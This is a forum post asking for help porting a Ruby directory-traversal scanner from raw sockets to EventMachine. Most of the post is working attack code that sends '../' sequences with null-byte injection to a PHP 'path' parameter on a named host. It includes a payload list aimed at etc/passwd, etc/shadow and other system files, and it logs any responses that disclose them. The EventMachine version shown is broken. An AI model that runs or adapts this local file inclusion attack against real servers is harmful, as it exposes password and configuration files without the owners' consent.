from 'socket' to 'eventmachine' http client.

B

Bigmac Turdsplash

im working on a vulnerability scanner, basically a http client... i have
a working script that only uses 'socket' but if i was using eventmachine
i would get better performance...

[working-script]
require 'socket'
my_file = File.new("log.txt", 'w')
html = File.new("log.html","w")
IO.foreach("list.lfi") do |block|
host = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
# This is the HTTP request we send to fetch a file
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
socket = TCPSocket.open(host,port) # Connect to server
socket.print(request+"Host: "+host+"\r\n\r\n") # Send
request
response = socket.read # Read complete response
# Split response at first blank line into headers and body
headers,body = response.split("\r\n\r\n", 2)
print request
#print body # And display it
check=body.scan("error")

mply=mply+1

if check.to_s == "error"
print 'no inclusion'
else
print 'Please notify site owner of exploit\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")

end
end
end
[working-script-end]


[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]

this script reads each line from the list then sends out a GET request,
if a config file is found viewable to the public then this will be
logged...

this script does not handle any kind of protocal, its more of a crude
ruff draft... if i could get eventmachine to handle the protocall
performance would increase and script wouldnt crash...

here is my attempt to use eventmachine...

[em-code]
require 'rubygems'
require 'eventmachine'
my_file = File.new("log.txt", 'w')
html = File.new("out.htm","w")
IO.foreach("list.lfi") do |block|
lfihost = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"


module DumbHttpClient
def post_init
print request
send_data request
@data = ""
@parsed = false
end

def receive_data data
@data << data
headers,body = data.split("\r\n\r\n", 2)
print data
EventMachine::stop_event_loop
end

end
EventMachine::run {
EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
}
puts "The event loop has ended"



print request
#print body # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
print 'no inclusion'
else
print 'FOUND ONE\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[em-end]

any one with eventmachine expearnce could give me some help... i dont
understand why strings wont exist inside the function.. clueless at this
point
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

No members online now.

Forum statistics

Threads
473,744
Messages
2,569,483
Members
44,901
Latest member
Noble71S45

Latest Threads

Top